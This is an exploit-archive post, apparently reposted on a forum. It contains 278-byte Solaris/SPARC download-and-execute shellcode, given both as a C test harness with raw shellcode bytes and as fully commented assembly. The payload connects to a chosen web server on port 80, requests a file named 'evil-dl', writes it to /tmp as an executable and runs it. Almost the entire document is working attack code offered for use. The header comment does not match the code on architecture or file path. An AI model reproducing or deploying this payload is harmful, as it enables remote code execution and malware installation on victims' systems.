solaris/sparc download and execute 278 bytes
[code]<pre>/*black-dl-exec-SOLARIS.c (MIPS) [278:bytes]
Dowloads a binary from host given named 'evil-dl' to '/tmp/ff' then executes.
11.21.6 Russell Sanford (xort@blacksecurity.org)
gcc -lnsl black-dl-exec-SOLARIS.c -o bdes
*/
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
// opcode encodings for performing sethi/or against/into register %o1 w/ nulled data
#define SETHI_O1 0x13000000
#define OR_O1 0x92126000
char dl_exec_sh[] =
"\xa6\x1a\xc0\x0b\x20\xbf\xff\xff\x20\xbf\xff\xff\x7f\xff\xff\xff\x90\x10\x20\x02\x92\x10\x20\x02"
"\x94\x1a\x80\x0a\x96\x1a\xc0\x0b\x98\x10\x20\x01\x82\x10\x20\xe6\x91\xd0\x20\x08\xc0\x2b\xe0\xa6"
"\xd0\x23\xbf\xfc\x92\x20\x3f\xfe\x93\x2a\x60\x10\x92\x22\x7f\xb0\xd2\x23\xbf\xec\x13\x37\xab\x6f"
"\x92\x12\x62\xef\xd2\x23\xbf\xf0\xc0\x23\xbf\xf4\x92\x03\xbf\xec\x94\x10\x20\x10\x82\x10\x20\xeb"
"\x91\xd0\x20\x08\xc0\x2b\xe1\x0e\x92\x03\xe0\xfc\x94\x20\x3f\xf2\xd0\x03\xbf\xfc\x82\x10\x20\x04"
"\x91\xd0\x20\x08\xc0\x2b\xe0\xfb\x90\x03\xe0\xf4\x94\x20\x3c\x13\x92\x20\x3e\xfe\x82\x10\x20\x05"
"\x91\xd0\x20\x08\xd0\x23\xbf\xf8\xd0\x03\xbf\xfc\x92\x03\xbf\xc4\x94\x10\x20\x14\x82\x10\x20\x03"
"\x91\xd0\x20\x08\xa4\xa4\xc0\x08\x02\x80\x00\x06\x94\x0a\x3f\xff\xd0\x03\xbf\xf8\x82\x10\x20\x04"
"\x91\xd0\x20\x08\x10\xbf\xff\xf5\x94\x1a\x80\x0a\xd4\x23\xe0\xfc\xd4\x23\xe0\xf0\x90\x03\xe0\xf4"
"\xd0\x23\xe0\xec\x92\x03\xe0\xec\x82\x10\x20\x0b\x91\xd0\x20\x08\x6f\x6d\x66\x67\x20\x73\x6f\x6c"
"\x61\x72\x69\x73\x20\x73\x68\x65\x6c\x6c\x63\x6f\x64\x65\x7a\x21\x2f\x74\x6d\x70\x2f\x71\x71\x41"
"\x47\x45\x54\x20\x2f\x65\x76\x69\x6c\x2d\x64\x6c\x0a\x0a";
void patchcode(long webserver) {
// fix sethi instruction to set up ip.
*(long *)&dl_exec_sh[68] = SETHI_O1 + ((webserver)>>10 & 0x3fffff);
// FIX or instruction to set up ip.
*(long *)&dl_exec_sh[72] = OR_O1 + (webserver & 0x2ff);
}
void (*fakefunc)();
void main() {
patchcode(inet_addr("10.1.1.3"));
char *buffer = (char *) malloc(1024);
memcpy(buffer, dl_exec_sh, 280);
fakefunc = buffer;
fakefunc();
}
/*
!----------------------------------------------------------------------------+
! (Solaris/Sparc) d/l + exec shellcode --+\+-- !
! --+\+-- Russell Sanford xort@blacksecurity.org !
!----------------------------------------------------------------------------+
! discription: Downloads a binary called 'evil-dl' from specified host to !
! '/tmp/qq' and then executes it. !
! +----------+
! bytes: 278 ! 11.21.06 !
!-----------------------------------------------------------------+----------+
.global main
main:
!------------------------------------------
! figure out our location in memory
!------------------------------------------
a:
xor %o3, %o3, %l3 ! stick a null in %o3 for later use
b: bn,a a ! returns location of call instruction in o7
c: bn,a b !
call c !
!------------------------------------------
! create a PF_INET socket().
!------------------------------------------
mov 0x2, %o0 ! PF_INET
mov 0x2, %o1 ! SOCK_STREAM
xor %o2, %o2, %o2 ! 0
xor %o3, %o3, %o3 ! 0 -- note: this may already be nulled...
mov 0x1, %o4 ! 1
mov 0xe6, %g1 ! SYS_so_socket
ta 8
stb %r0, [%o7 + 166] ! here we patch the foward jump
st %o0, [%sp + -4] ! store sockfd in sp-4
!------------------------------------------
! create sockaddr_in struct
!------------------------------------------
conout:
sub %r0, -2, %o1
sll %o1, 16, %o1
sub %o1, -80, %o1 ! set port to port 80
st %o1, [%sp - 20] !
sethi %hi(0xDEADBEEF), %o1 ! set %o1 to hex value of ip address (substitute from 0xdeadbeef)
or %lo(0xDEADBEEF), %o1, %o1 !
st %o1, [%sp - 16] ! store address from %o1 in struct.
st %r0, [%sp - 12]
!------------------------------------------
! connect() to host.
!------------------------------------------
! note: %o0 still sockfd from socket()
add %sp, -20, %o1 ! pointer to sockaddr_in struct
mov 16, %o2 ! sizeof(struct sockaddr)
mov 235, %g1 ! SYS_connect
ta 8
!------------------------------------------
! send request for file
!------------------------------------------
stb %r0, [%o7 + 270]
add %o7, 252, %o1 ! 252 - distance from call to string
sub %r0, -14, %o2 ! set %o2 to 14 (bytes - size of request) ... 252-238=14
ld [%sp + -4], %o0 ! load filefd's fd from sp-4
mov 4, %g1 ! SYS_write
ta 8
!------------------------------------------
! open file
!------------------------------------------
stb %r0, [%o7 + 251]
add %o7, 244, %o0 ! distance to beginning of localfile string
sub %g0, -1005, %o2 ! (1005) perms = rwxr-xr-x
sub %g0, -258, %o1 ! set %o0 to 0x102 (O_RWONLY|O_CREAT) ... 248+14=258
mov 5, %g1 ! SYS_open
ta 8
st %o0, [%sp + -8] ! store filefd's fd in sp-8
read_loop:
!------------------------------------------
! read from website
!------------------------------------------
ld [%sp + -4], %o0 ! set %o0 to sockfd's fd
add %sp, -60, %o1 ! buffer space
mov 20, %o2 ! 20 bytes
mov 3, %g1 ! SYS_read
ta 8
subcc %l3, %o0, %l2 ! compare %o0 (bytes read) to %l3 (zero)
be dl_loop_exit
!------------------------------------------
! write to file
!------------------------------------------
! note: %o1 still points to buffer
and %o0, -1, %o2 ! set %o2 to bytes read
ld [%sp + -8], %o0 ! set %o0 to filefd's fd from sp-8
mov 4, %g1 ! SYS_write
ta 8
ba read_loop ! loop back to beginning fo read_loop
!------------------------------------------
! execute file
!------------------------------------------
dl_loop_exit:
! here we patch the string under local_file to be the correct args to pass to exec
xor %o2, %o2, %o2 ! set %o2 to 0
st %o2, [%o7 + 252] ! store null dword in mem
st %o2, [%o7 + 240] ! store null dword in mem
add %o7, 244, %o0 ! set %o0 to point to string: '/tmp/qq'
st %o0, [%o7 + 236] ! store pointer to string in struct in memory
add %o7, 236, %o1 ! set %o1 to point to beginning of struct
mov 0xb, %g1 ! SYS_execl
ta 8
.ascii "omfg solaris shellcodez!" ! for some lol'in
local_file:
.ascii "/tmp/qq"
.byte 0x41
remote_file:
.ascii "GET /evil-dl"
.byte 0xa
.byte 0xa
end:
*/
</pre>[/code]
页:
[1]